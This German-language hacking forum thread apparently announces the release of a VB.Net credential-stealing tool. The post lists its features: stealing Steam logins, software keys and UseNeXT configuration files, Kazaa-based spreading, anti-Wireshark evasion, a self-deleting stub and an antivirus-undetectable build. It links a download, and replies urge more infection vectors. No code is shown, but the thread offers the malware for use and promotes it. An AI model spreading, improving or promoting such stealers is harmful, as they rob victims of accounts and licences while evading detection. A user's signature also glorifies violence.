[RELEASE] [SC] Steam + UseNexT + Key Stealer [VB.Net]


  • Ich habs extra gecodet und hier stell ich euch mal bisschen was vor.


    Funktionen:


    -Steam Stealer(Sendet die Logs unverschlüsselt also kein decrypten von den Passwörtern nachdem die Logs da sind)
    -Key Stealer(Aktuelle Keys werden hinzugefügt)
    -Anti Wireshark(Falls das Fenster gefunden wird beenden)
    (Nicht Prozessname sondern Fenstername)
    -P2P Spreading über Kazaa
    -UseNexT Stealer(Nur die config.dat)
    -Melt Stub(Nach dem ausführen wird die Stub gelöscht)
    -Crypt Logs(Logs werden verschlüsselt gesendet)
    -Fake Message(halt Fake Message :P)
    -Stub Size(Ich probiere unter 20kb)
    (Hab neue Methode gefunden um die EXE kleiner bei .Net zu bekommen)
    -Keine Form(Keine versteckte Form oder Console sondern es wird Code ausgeführt ohne eine Form oder Console)



    Achja alles in Visual Basic.Net gecoded (Framework 2.0)
    ©alexj.


    V.1



    Download:


    P.S.


    ALLES IS SELBER GECODET. ICH KANN NUR CREDITS creative.exploit geben für das Stub beispiel geben so habe ich gelernt was Stub bedeutet jedoch ist der Source umgeschrrieben von ihn sodass es jetzt besser funktioniert.
    Alles andere ist selber geschreiben.

    Bog cuva srbe


    Einmal editiert, zuletzt von Founder ()

  • Schaut echt nice aus. Wo ich aber noch was machen würde ist, mehr Spreading optionen. Kenne kein mehr der Kazza hat.... Aber sonst echt nice..


    Wird der öffentlich gestellt, oder verkauft ??

  • Zitat von alexj.;14713

    Was für Credits ?


    Die Decryption Routinen, Anti Wireshark etc. Oder kommt das etwa alles von dir?


    Edit: Ach du hast ja schon editiert... ;)

    Sie gehen auf ihren kommandierenden<br />Offizier zu, setzen ihm die Waffe an<br />den Kopf und blasen ihm das Gehirn raus.

  • Zitat von Serverspy;14730

    wann ist es endlich soweit, dass es das Teil mal zum Testen gibt?


    Oben stehts bis zum nächstem Wochende ;)


    Eigentlich könnte ich es heute fertig machen bin aber zu faul :D

  • is davon auszugehen, wenn es noch keiner hat ;)


    Franky:
    weiÃ?t du wo die daten jetzt liegen?


    @alexj:
    sehr nettes tool, beeil dich mit der fertigstellung^^
    Meinste du kannst noch mehr spread funktionen einstellen?
    so was wie icq/msn/oder usb?
    aber auf jeden fall mehr P2P tools einfügen, kazaa nutzen soweit ich wei� nich viele -.-

    Zitat von &quot;Autofreund&quot;

    Bist du jetzt doch schwul?


    Zitat von &quot;GODFATHER&quot;

    Das fragt mich ein Opelfahrer lol

  • [COLOR=Silver]Release:


    Weitere Funktionen folgen wahrscheinlich am Wochende.


    Logbeispiel


    Hab paar funktionen deaktviert alles was man ankreuzen kann funktioniert auch alles selftestet.


    Screen(Momentan):



    Wie gesagt Anti-Wireshark funktioniert nicht über Prozessname sondern über FindWindow(Selftestested worked)


    Stub Size: 18.432(18kb) Bytes(mit Icon)


    Eine Fake Message muss immer sein. Ist FUD des wei�? ich ohne zu scannen ;) Aber ihr könnt es auch gerne Scannen.


    Download:
    [hide]
    http://rapidshare.com/files/210782979/___by_alexj.rar
    [/hide]

    Bog cuva srbe


    Einmal editiert, zuletzt von Founder ()

  • Hatten ja schon in ICQ gesprochen gefällt auch mir wirklich gut super Arbeit *daumenhoch*